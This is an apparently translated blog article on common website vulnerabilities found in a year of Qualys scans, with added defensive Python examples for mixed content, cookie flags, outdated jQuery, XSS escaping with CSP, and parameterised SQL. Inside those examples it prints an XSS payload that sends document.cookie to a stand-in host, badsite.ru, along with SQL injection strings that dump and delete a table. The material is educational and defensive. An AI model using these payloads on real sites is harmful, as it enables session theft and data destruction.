Deadly sins of website security: what we learned from a year of vulnerability scan statistics

About a year ago we at DataLine launched a service for finding and analyzing vulnerabilities in IT applications. The service is built on the Qualys cloud solution, which we have already written about. Over a year of working with it we ran 291 scans of different sites and collected statistics on the most common web application vulnerabilities.

In this article I will show which holes in website protection hide behind the different criticality levels. Let's look at which vulnerabilities the scanner found most often, why they appear, and how to protect against them.


Qualys divides all web application vulnerabilities into three criticality levels: low, medium and high. If you look at the distribution by severity, things don't look too bad: there are few high-criticality vulnerabilities, and the majority are non-critical:


But non-critical does not mean harmless. These findings can also cause serious damage.

Top "non-critical" vulnerabilities

  1. Mixed content.

    The baseline for website security is transferring data between client and server over HTTPS, which encrypts the traffic and protects it from interception.

    Some sites use mixed content: part of the data is transferred over plain HTTP. Most often this is how passive content is delivered, i.e. data that only affects how the site looks: images, audio, video. But sometimes active content is delivered this way too: scripts that control the site's behaviour (browsers also treat stylesheets and frames as active content, because they can change what the page does). In that case an attacker on the network path can read the active content coming from the server, rewrite it on the fly and make the page behave in a way its developers never intended.

    Current browsers warn users that pages with mixed content are insecure: they block active mixed content outright and warn about (or automatically upgrade) passive content. Site developers also see these warnings in the browser console. For example, this is how it looks in Firefox:


    What's the danger: attackers use the unprotected protocol to intercept user data, swap scripts and send requests to the site on the user's behalf. Even if the visitor entered no data, that does not protect them from phishing, i.e. obtaining confidential information by deception. For example, an injected script can redirect the user to a malicious site that looks familiar to them. Sometimes the malicious site even looks better than the original, and the user fills in a form themselves and hands over confidential data.

    What a web developer should remember: even if the site administrator has installed and configured a TLS certificate, the vulnerability can appear through human error. For example, one page contains not a relative link but an absolute one starting with http://, and on top of that no redirect from http to https has been set up. Note that a redirect alone does not help for active content: the browser blocks the http:// request before it is ever sent. Fix the link itself (https://, a protocol-relative //host/path or a root-relative /path), or send Content-Security-Policy: upgrade-insecure-requests so the browser rewrites such links to https.

    You can find mixed content on a site with a browser: view the page source and read the notices in the developer console. But the developer will have to dig through the code for a long time and tediously. Automated analysis tools speed this up, for example SSL Check, the free Lighthouse tool or the paid Screaming Frog SEO Spider.

    The vulnerability can also come from legacy code, i.e. code inherited from predecessors. For example, some pages are generated from an old template that does not account for the site's move to https.
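The checks described above can be automated. What follows is an added example (not code from the original article or from the Qualys service): a small mixed-content finder that resolves every subresource reference the way a browser does and classifies it as active or passive. It also flags a form containing a password field whose action is http://, which is the "login form not submitted via HTTPS" finding discussed under the critical vulnerabilities later. Tag-to-attribute tables and the sample page are my own constructions.

```python
# Added example, not code from the original article: a small mixed-content
# finder for a page that is served over HTTPS. Uses only the standard library.
# The sample page below is constructed for the example.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Browsers block http:// loads of these tags outright ("active" mixed content),
# because a man-in-the-middle who replaces them runs code inside the page.
ACTIVE_REFS = {"script": "src", "iframe": "src", "object": "data", "embed": "src"}
# These only affect what is displayed ("passive" mixed content): warned about
# or upgraded, but still a leak of what the user is looking at.
PASSIVE_REFS = {"img": "src", "video": "src", "audio": "src", "source": "src"}


class MixedContentFinder(HTMLParser):
    """Collects (severity, tag, absolute URL) for every reference to http://."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []
        self._form_action = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        ref, severity = None, None
        if tag in ACTIVE_REFS:
            ref, severity = a.get(ACTIVE_REFS[tag]), "active"
        elif tag in PASSIVE_REFS:
            ref, severity = a.get(PASSIVE_REFS[tag]), "passive"
        elif tag == "link" and "stylesheet" in (a.get("rel") or "").lower():
            ref, severity = a.get("href"), "active"   # stylesheets count as active content
        if ref:
            # Resolve the link the way the browser does: "css/site.css" and
            # "//cdn.example.com/x.js" inherit https from the page, "http://..." does not.
            url = urljoin(self.page_url, ref)
            if urlsplit(url).scheme == "http":
                self.findings.append((severity, tag, url))
        # A form whose action is http:// submits its fields in clear text, which is
        # the "login form not submitted via HTTPS" finding when it holds a password.
        if tag == "form":
            self._form_action = urljoin(self.page_url, a.get("action") or "")
        elif (tag == "input" and (a.get("type") or "").lower() == "password"
              and self._form_action and urlsplit(self._form_action).scheme == "http"):
            self.findings.append(("critical", "form", self._form_action))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None


def find_mixed_content(page_url, html):
    """Return [(severity, tag, url)] for all http:// loads and insecure password forms."""
    parser = MixedContentFinder(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one stylesheet, one script and one image over http://,
# one protocol-relative script (fine) and a login form posting to http://.
SAMPLE_PAGE = """
<html><head>
  <link rel="stylesheet" href="http://static.example.com/site.css">
  <link rel="stylesheet" href="css/site.css">
  <script src="//cdn.example.com/jquery.min.js"></script>
  <script src="http://cdn.example.com/analytics.js"></script>
</head><body>
  <img src="http://static.example.com/logo.png">
  <form action="http://www.example.com/login" method="post">
    <input type="text" name="user"><input type="password" name="pass">
  </form>
</body></html>
"""

if __name__ == "__main__":
    for severity, tag, url in find_mixed_content("https://www.example.com/index.html", SAMPLE_PAGE):
        print(f"{severity:8} <{tag}> {url}")
```

Run against a real page by fetching its HTML over HTTPS and passing the final URL as page_url; the protocol-relative script in the sample resolves to https and is correctly not reported, while the absolute http:// links are.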

  2. Cookies without the "HttpOnly" and "Secure" flags.

    The HttpOnly flag hides the cookie from scripts running in the page (document.cookie), which is how an XSS payload steals a session. The Secure flag stops the browser from sending the cookie in clear text: it is only attached to requests made over HTTPS.

    Both flags are set as attributes of the cookie:

    Set-Cookie: name=value; Secure; HttpOnly

    What's the danger: if the site developer has not set these flags, an attacker can steal user data from the cookie and use it. If cookies are used for authentication and authorization, the attacker can hijack the user's session and act on the site on their behalf.

    What a web developer should remember: as a rule, popular frameworks set these flags automatically. But check the web server configuration too and make sure the session cookie is issued with Secure and HttpOnly.

    Note that HttpOnly also makes the cookie invisible to your own JavaScript, so it belongs on cookies that scripts do not need to read.
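As an added example (mine, not from the original article), here is a check of Set-Cookie headers for the two flags, next to a function that appends the missing ones, which is what a reverse proxy in front of a legacy application would do. The response headers are constructed; the parser is deliberately minimal and only understands the attribute syntax shown above.

```python
# Added example, not from the original article: audit Set-Cookie headers for the
# Secure and HttpOnly flags and show the hardened header next to the weak one.
# The response headers below are constructed for the example.

def parse_set_cookie(header_value):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: val_or_True})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return name.strip(), value.strip(), attrs


def missing_flags(header_value):
    """Names of the protective flags the cookie lacks (empty list = fine)."""
    _, _, attrs = parse_set_cookie(header_value)
    return [flag for flag in ("Secure", "HttpOnly") if flag.lower() not in attrs]


def harden_set_cookie(header_value):
    """Return the header with the missing flags appended, e.g. from a reverse proxy."""
    extra = missing_flags(header_value)
    return header_value.rstrip("; ") + "".join(f"; {flag}" for flag in extra)


def audit_response(headers):
    """headers: list of (name, value) pairs as sent by the server.
    Returns {cookie_name: [missing flags]} for every Set-Cookie header."""
    report = {}
    for name, value in headers:
        if name.lower() == "set-cookie":
            cookie_name = parse_set_cookie(value)[0]
            report[cookie_name] = missing_flags(value)
    return report


# Constructed sample response: a session cookie with neither flag, a CSRF cookie
# that is Secure but readable by scripts, and a correctly flagged session cookie.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "PHPSESSID=3f9a1c; Path=/"),
    ("Set-Cookie", "csrf=d41d8c; Path=/; Secure"),
    ("Set-Cookie", "session=8b2e; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

if __name__ == "__main__":
    for cookie, missing in audit_response(SAMPLE_HEADERS).items():
        print(cookie, "missing:", missing or "nothing")
    print(harden_set_cookie("PHPSESSID=3f9a1c; Path=/"))
    # -> PHPSESSID=3f9a1c; Path=/; Secure; HttpOnly
```

The csrf cookie in the sample is reported as lacking HttpOnly; that can be intentional when a script must read it to send a header (the double-submit pattern), which is why the audit reports rather than silently rewrites.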

  3. Path-based vulnerability.

    The scanner reports this vulnerability when it finds a publicly accessible file or site directory with potentially confidential information. For example, it sees system configuration files or gets access to the whole file system. This happens when access rights on the site are set incorrectly.

    What's the danger: if the file system "leaks out", the attacker can land in the operating system's interface and look for folders with passwords stored in clear text (don't do that!). Or they can pull out password hashes and brute-force them, then try to escalate privileges on the system and move deeper into the infrastructure.

    What a web developer should remember: don't forget about access rights, and configure the platform, the web server and the web application so that it is impossible to "escape" from the web root directory.

  4. Forms for sensitive data with autocomplete enabled.

    If a user often fills in forms on websites, their browser remembers the data through the autocomplete feature.

    Forms on a website may contain fields for sensitive data such as passwords or credit card numbers. For such fields it makes sense to disable autocomplete on the site itself.

    What's the danger: if the user's browser has stored sensitive data, an attacker can get it later, for example through phishing. In effect, a web developer who forgot about this detail exposes their users.

    What a web developer should remember: this is the classic conflict of convenience vs security. If the developer cares about user experience, they may keep autocomplete on deliberately. For example, when it is important to follow the Web Accessibility Guidelines, the recommendations on making content accessible to users with disabilities.

    In most browsers you can disable autocomplete with the autocomplete="off" attribute, on the whole form or per field, for example:

     <body>
        <form action="/form/submit" method="post" autocomplete="off">
          <div>
            <input type="text" name="fname" placeholder="First Name">
          </div>
          <div>
            <!-- per-field override: this one is allowed to autocomplete -->
            <input type="text" id="lname" name="lname" placeholder="Last Name" autocomplete="on">
          </div>
          <div>
            <!-- text + inputmode rather than type="number": a card number is not a number -->
            <input type="text" name="cc" inputmode="numeric" placeholder="Credit card number">
          </div>
          <input type="submit">
        </form>
      </body>

    But this won't work in Chrome, which ignores autocomplete="off" for address and payment fields. There it has to be worked around with JavaScript; a variant of the recipe is linked from the original Habr article.

  5. The X-Frame-Options header is not set in the site's code.

    This header controls embedding in frame, iframe, embed or object tags. With it you can completely forbid embedding your site inside a frame: set X-Frame-Options: deny. Or you can set X-Frame-Options: sameorigin, then embedding in an iframe is only possible from your own site.

    What's the danger: a missing header lets malicious sites use your pages for clickjacking. In this attack the attacker places a transparent frame over buttons and tricks the user. For example: scammers imitate a social network's pages on their site. The user thinks they are clicking a button on that site. Instead the click is intercepted and the user's request goes to the social network where they have an active session. This is how attackers send spam on the user's behalf or collect subscribers and likes.

    If you don't set this header, an attacker can put your application's button on a malicious site. They may be interested in your referral program or in your users.

    What a web developer should remember: the vulnerability also appears when X-Frame-Options with a conflicting value is set on the web server or load balancer. In that case the server or balancer overwrites the header, because they have higher priority than the backend code.

    The deny and sameorigin values of X-Frame-Options break Yandex Webvisor. To allow Webvisor's iframes, write a separate rule in the configuration. For example, in nginx you can configure it like this (note that the ALLOW-FROM value is obsolete and ignored by current browsers, and keying on the Referer header is only a heuristic; for allowing a specific third-party embedder use the Content-Security-Policy frame-ancestors directive instead):

    http {
        ...
        map $http_referer $frame_options {
            "~webvisor.com" "ALLOW-FROM http://webvisor.com";
            default         "SAMEORIGIN";
        }
        add_header X-Frame-Options $frame_options;
        ...
    }


  6. PRSSI (path-relative style sheet import) vulnerability.

    This is a vulnerability in how the site loads its styles. It occurs when stylesheets are referenced with path-relative links such as href="somefolder/styles.css". The browser resolves such a link against the path of the page it is on, so an attacker who finds a way to send the user to a crafted URL with extra path segments changes where the browser looks for the stylesheet. The page then effectively adds the relative link onto its own URL and imitates a stylesheet request: you get a request like badsite.ru/…/somefolder/styles.css/, and whatever the server answers with is applied as styles, which can perform malicious actions under the guise of CSS.

    What's the danger: a fraudster can use this vulnerability if they find another security hole as well. As a result, user data in cookies or tokens may leak.

    What a web developer should remember: set the X-Content-Type-Options header to nosniff. The browser will then check the declared Content-Type of the response; if it is anything other than text/css, the browser refuses to apply it as a stylesheet. Referencing stylesheets with root-relative (/somefolder/styles.css) or absolute URLs removes the problem at the source.
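As an added illustration (mine, not from the original article), the following shows the two halves of the point above: how the same path-relative href resolves on a normal versus a crafted page URL, and the decision a browser makes when the response is not text/css with and without nosniff. The URLs are constructed; the quirks-mode condition models the documented browser behaviour that PRSSI exploitation relies on.

```python
# Added example, not from the original article: how a path-relative stylesheet
# link resolves under a crafted URL, and what X-Content-Type-Options: nosniff
# changes. The URLs and responses are constructed for the example.
from urllib.parse import urljoin


def stylesheet_request_url(page_url, href):
    """The URL a browser requests for <link rel="stylesheet" href=...> on page_url.
    Relative references are resolved against the page's path (RFC 3986)."""
    return urljoin(page_url, href)


def browser_applies_stylesheet(content_type, nosniff, quirks_mode=False):
    """Does the browser use the response body as CSS?
    With nosniff the declared type must be text/css. Without nosniff a page in
    quirks mode (no <!DOCTYPE>) still accepts same-origin responses of other
    types, which is what makes PRSSI exploitable."""
    mime = content_type.split(";")[0].strip().lower()
    if mime == "text/css":
        return True
    return (not nosniff) and quirks_mode


if __name__ == "__main__":
    href = "somefolder/styles.css"
    # Normal visit: the stylesheet is fetched from where the developer expects.
    print(stylesheet_request_url("https://example.com/page", href))
    # Crafted visit: extra path segments (served by the same handler as /page when
    # the server ignores trailing path info) move the request to a different path,
    # and the "stylesheet" the browser gets back is the HTML page itself.
    print(stylesheet_request_url("https://example.com/page/x/", href))
    # Root-relative link: resolves the same way whatever the page URL looks like.
    print(stylesheet_request_url("https://example.com/page/x/", "/somefolder/styles.css"))
    # Server answers with HTML instead of CSS:
    print(browser_applies_stylesheet("text/html", nosniff=False, quirks_mode=True))  # attack works
    print(browser_applies_stylesheet("text/html", nosniff=True, quirks_mode=True))   # blocked
```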

Critical vulnerabilities

  1. A page with a password field is delivered from the server over an unprotected channel (HTML form containing a password field is served over HTTP).

    A server response over an unencrypted channel is vulnerable to a man-in-the-middle attack. An attacker can intercept the traffic and wedge themselves between client and server while the page travels from the server to the client.

    What's the danger: the fraudster can modify the page and hand the user a form for confidential data that submits to the attacker's server.

    What a web developer should remember: some sites send users a one-time code by email or phone instead of a password. In that case the vulnerability is less critical, although the mechanism makes life harder for users.

  2. A form with login and password is submitted over an unprotected channel (Login form is not submitted via HTTPS).

    Here the form with login and password travels from the user to the server over an unencrypted channel.

    What's the danger: unlike the previous case, this is critical. Intercepting the sensitive data is trivial: you don't even need to write code to do it.

  3. Using JavaScript libraries with known vulnerabilities.

    During the scans the most frequently encountered library was jQuery, in a wide range of versions. Each version has one or more known vulnerabilities. The impact varies greatly depending on the nature of the vulnerability.

    What's the danger: there are public exploits for the known vulnerabilities, for example:


    What a web developer should remember: regularly go through the cycle: check for known vulnerabilities, fix, check again. If you deliberately use legacy libraries, for example to support old browsers or to save money, look for a way to mitigate the known risk.
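The "check" step of that cycle, as an added example (mine, not the scanner's logic or the article's code): pull library versions out of a page's script tags and compare them with the version in which each issue was fixed. The advisory table is a two-entry excerpt I compiled from jQuery's published fixes (prototype pollution fixed in 3.4.0, the htmlPrefilter XSS issues fixed in 3.5.0), not a full database; the sample page is constructed.

```python
# Added example, not from the original article: extract JavaScript library
# versions from a page's <script> tags and compare them against advisories.
# The advisory table is a small excerpt compiled for this example, not the
# scanner's database; the page is constructed.
import re
from html.parser import HTMLParser

# library -> [(first fixed version, advisory)]
ADVISORIES = {
    "jquery": [
        ((3, 4, 0), "CVE-2019-11358: prototype pollution via jQuery.extend"),
        ((3, 5, 0), "CVE-2020-11022 / CVE-2020-11023: XSS when untrusted HTML is passed to DOM methods"),
    ],
}

# "jquery-1.12.4.min.js" and ".../libs/jquery/3.5.1/jquery.min.js" both match;
# "jquery-ui-1.12.1.js" and "jquery.min.js" do not.
VERSION_RE = re.compile(r"jquery[-./]?(\d+(?:\.\d+)+)", re.IGNORECASE)


def parse_version(text):
    return tuple(int(x) for x in text.split("."))


def library_version(src):
    """('jquery', (1, 12, 4)) for a jQuery script URL, ('jquery', None) when the
    file is jQuery but carries no version, None for any other script."""
    path = src.split("?")[0].lower()
    filename = path.rsplit("/", 1)[-1]
    if "jquery" not in filename:
        return None
    m = VERSION_RE.search(path)
    version = parse_version(m.group(1)) if m else None
    return "jquery", version


def known_issues(version):
    """Advisories that apply to a version (versions compare as tuples)."""
    if version is None:
        return ["version unknown: check the file header manually"]
    return [advisory for fixed_in, advisory in ADVISORIES["jquery"] if version < fixed_in]


class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def scan_scripts(html):
    """[(src, version tuple or None, [issues])] for every jQuery script in the page."""
    collector = ScriptCollector()
    collector.feed(html)
    results = []
    for src in collector.sources:
        lib = library_version(src)
        if lib:
            results.append((src, lib[1], known_issues(lib[1])))
    return results


# Constructed sample page: an old jQuery, a current one, and one without a version.
SAMPLE_PAGE = """
<script src="https://code.jquery.com/jquery-1.12.4.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="/static/jquery.min.js"></script>
<script src="/static/app.js"></script>
"""

if __name__ == "__main__":
    for src, version, issues in scan_scripts(SAMPLE_PAGE):
        print(src, version, issues)
```

Filename matching is a heuristic: bundlers rename files, so for anything reported as "version unknown" read the version banner at the top of the file itself.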

  4. Cross-site scripting (XSS).
    Cross-site scripting (XSS) is an attack on a web application in which the attacker gets their own script into pages that other users load. If Qualys finds such a vulnerability, it means a potential attacker can inject (or has already injected) their own JS into the site's code to perform malicious actions.

    Stored XSS is the most dangerous, because the payload is saved on the server and executed every time the attacked page is opened in a browser.

    Reflected XSS is easy to carry out because the malicious script can be injected into the HTTP request. The application receives the HTTP request, doesn't validate the data, packages it into the page and sends it straight back. If the attacker gets a request containing a script like

    <script>/* something bad */</script>

    in front of the user (through a crafted link or intercepted traffic), the malicious request is executed on the client's behalf.

    A striking example of XSS: JS sniffers that imitate the pages for entering the CVC, card expiration date and so on.

    What a web developer should remember: in the Content-Security-Policy header, use the script-src directive to force the client's browser to load and execute code only from trusted sources. For example, script-src 'self' whitelists only scripts from our own site.
    Be careful with inline code: the 'unsafe-inline' value allows inline JS/CSS, but it also lets an injected <script> run, which defeats the policy. If inline scripts are unavoidable, allow each one individually with a nonce or a hash instead. Combined with script-src 'self' this stops third-party scripts from being loaded.

    Make sure to log everything with report-uri and watch for attempts to execute scripts on the site.
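As an added example (mine, not code from the original article), here is the reflected-XSS sink next to its escaped form, and a Content-Security-Policy built the way the paragraph above recommends: script-src limited to 'self' plus a per-response nonce for the page's own inline script, with report-uri for violation reports. Function names, the /csp-report path and the sample query are my own assumptions.

```python
# Added example, not from the original article: a reflected-XSS sink next to its
# escaped form, and a Content-Security-Policy that allows the page's own inline
# script by nonce instead of 'unsafe-inline'. Names are mine; the query is constructed.
import html
import secrets


def render_results_vulnerable(query):
    """Reflects the query into the page unchanged: a <script> in it runs."""
    return f"<h1>Results for {query}</h1>"


def render_results_safe(query):
    """Escapes <, >, &, quotes so the query is shown as text, never parsed as markup."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def csp_header(nonce, report_uri="/csp-report"):
    """script-src restricted to our origin plus one per-response nonce. Any injected
    <script> lacks the nonce and is blocked; report-uri sends the violation to us."""
    return ("default-src 'self'; "
            f"script-src 'self' 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'self'; "
            f"report-uri {report_uri}")


def build_response(query):
    """(headers, body) for a search page: a fresh nonce per response, bound to the
    page's own inline bootstrap script."""
    nonce = secrets.token_urlsafe(16)
    body = (f'<script nonce="{nonce}">initSearch();</script>'
            + render_results_safe(query))
    return {"Content-Security-Policy": csp_header(nonce)}, body


if __name__ == "__main__":
    payload = '<script>document.location="http://badsite.ru/?c="+document.cookie</script>'
    print(render_results_vulnerable(payload))   # script tag reaches the browser intact
    print(render_results_safe(payload))         # shown as &lt;script&gt;..., not executed
    headers, body = build_response(payload)
    print(headers["Content-Security-Policy"])
```

Escaping is the primary fix; the CSP is defence in depth for the sink you missed, and the nonce must be generated per response, never hard-coded, or it becomes a second 'unsafe-inline'.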

  5. SQL injection.
    The vulnerability means SQL code can be inserted through the website into a query that accesses the site's database directly. SQL injection is possible when user input is not validated: it isn't checked for correctness and is used in the query as is. For example, it happens when a form on the site does not check that the input matches the expected data type.

    What's the danger: if the attacker injects a SQL query through such a form, they can corrupt the database or disclose confidential information.

    What a web developer should remember: don't trust anything that comes from the browser. You need protection on both the client side and the server side.

    On the client side, write local validation in JavaScript. This improves usability, but it is not a security control: an attacker sends requests without the browser's help, so the server-side protection is the one that counts.

    Built-in functions of popular frameworks help escape suspicious characters on the server. Better still, use parameterized queries on the server: the input is then passed to the database as data and is never interpreted as part of the SQL statement.

    Check where database interaction happens in the web application.

    Interaction happens whenever we receive any data: a request with an identifier (change of id), creation of a new user, a new comment, or new records in the database. That's where SQL injection can occur. Even when we delete a record from the database, SQL injection is possible.
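To make the last two points concrete, an added example (mine, not from the original article): the same lookup and the same delete written with string concatenation and with parameter binding, run against an in-memory SQLite table constructed for the example. The numeric-id delete shows that the injection does not need quotes at all.

```python
# Added example, not from the original article: the same two queries written with
# string concatenation (injectable) and with parameter binding (safe), run against
# an in-memory SQLite database constructed for the example.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (name, password_hash) VALUES (?, ?)",
                     [("alice", "hash-of-alice"), ("bob", "hash-of-bob")])
    conn.commit()
    return conn


def find_user_vulnerable(conn, name):
    # The input is pasted into the statement, so quotes and keywords in it are SQL.
    sql = f"SELECT name FROM users WHERE name = '{name}'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, name):
    # The driver sends the value separately; it can only ever be compared as data.
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE name = ?", (name,))]


def delete_user_vulnerable(conn, user_id):
    # "Even deleting a record": an unquoted numeric id is just as injectable.
    return conn.execute(f"DELETE FROM users WHERE id = {user_id}").rowcount


def delete_user_safe(conn, user_id):
    # Bound parameter: "1 OR 1=1" is compared to the integer column as text and matches nothing.
    return conn.execute("DELETE FROM users WHERE id = ?", (user_id,)).rowcount


def count_users(conn):
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"
    print(find_user_vulnerable(conn, payload))   # ['alice', 'bob']: the WHERE clause is always true
    print(find_user_safe(conn, payload))         # []: no user is literally named "' OR '1'='1"
    print(delete_user_safe(conn, "1 OR 1=1"), "rows deleted")        # 0
    print(delete_user_vulnerable(conn, "1 OR 1=1"), "rows deleted")  # 2: the whole table is gone
```

In a real application the id would additionally be converted to int before the query; the point of the example is that binding alone already keeps the input from being parsed as SQL, whereas escaping has to be done correctly for every call site.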

General tips

Don't reinvent the wheel, use proven frameworks. As a rule, popular frameworks are more secure. For .NET: ASP.NET MVC and ASP.NET Core; for Python: Django or Flask; for Ruby: Ruby on Rails; for PHP: Symfony, Laravel, Yii; for JavaScript: Node.js with Express.js; for Java: Spring MVC.

Follow vendor updates and update regularly. A vulnerability gets found, then an exploit is written and made public, and everything happens all over again. Subscribe to updates of stable releases from the software vendor.

Check access rights. On the server side, always treat your code as if it had been written, from the first letter to the last, by your sworn enemy who wants to break your site and violate the integrity of your data. Sometimes that is actually the case.

Use clones and test sites, and only then deploy to production. This helps, first of all, to avoid mistakes and errors on the production site: the production site brings in money, so a clean production environment matters. When adding, fixing or closing any problem, work in the test environment, then check the functionality and the vulnerabilities found, and only then plan the work on the production environment.

Protect your web application with a Web Application Firewall and combine reports from a vulnerability scanner with it. For example, DataLine uses Qualys together with FortiWeb as a service bundle.

source: www.habr.com
